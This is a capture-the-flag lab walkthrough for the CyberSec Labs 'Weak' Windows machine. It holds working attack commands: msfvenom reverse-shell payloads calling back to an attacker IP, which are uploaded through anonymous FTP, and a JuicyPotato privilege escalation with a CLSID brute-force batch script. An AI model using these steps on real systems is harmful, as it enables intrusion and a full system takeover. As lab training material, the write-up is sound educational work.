172.21.1.1

CyberSec Labs Weak Walkthrough

FTP anonymous login allowed

upload shell.aspx rev shell and get a shell

     msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f aspx > shell.aspx

http://172.31.1.11/shell.aspx

Priv Esc

Running whoami /priv we get SeImpersonatePrivilege token enabled

So a juicy potato attack might be useful here

It is running Windows 7 (That’s a good thing)

Grab the CLSID.list for windows 7

And I would run testcli.bat that finds working CLSID for current windows 7 and stores it in result.log

Testcli.bat consist of a simple bat script

——————————————

@echo off

:: Starting port, you can change it

set /a port=1337

SETLOCAL ENABLEDELAYEDEXPANSION

FOR /F %%i IN (CLSID.list) DO (

   echo %%i !port!

   juicypotato.exe -z -l !port! -c %%i >> result.log

   set RET=!ERRORLEVEL!

   :: echo !RET!

   if “!RET!” == “1”  set /a port=port+1

)

Checking result.log we get lot’s of CLSID.

Cool so we can use NT AUTHORITY CLSID with juicypotato to get a NT AUTHORITY shell.

Now running juicypotato with generated reverse shell and passing Nt authority CLSID we get NT AUTHORITY shell

JuicyPotato.exe -l 1337 -p C:\Users\Public\Downloads\shell.exe -t * -c {687e55ca-6621-4c41-b9f1-c0eddc94bb05}

     Note: here shell.exe is a msfvenom generated reverse shell listening on port 443

     msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f exe -o shell.exe

Listening on port 443 we get NT authority/system shell

And now we can grab the silly flags


Author

Sentinal920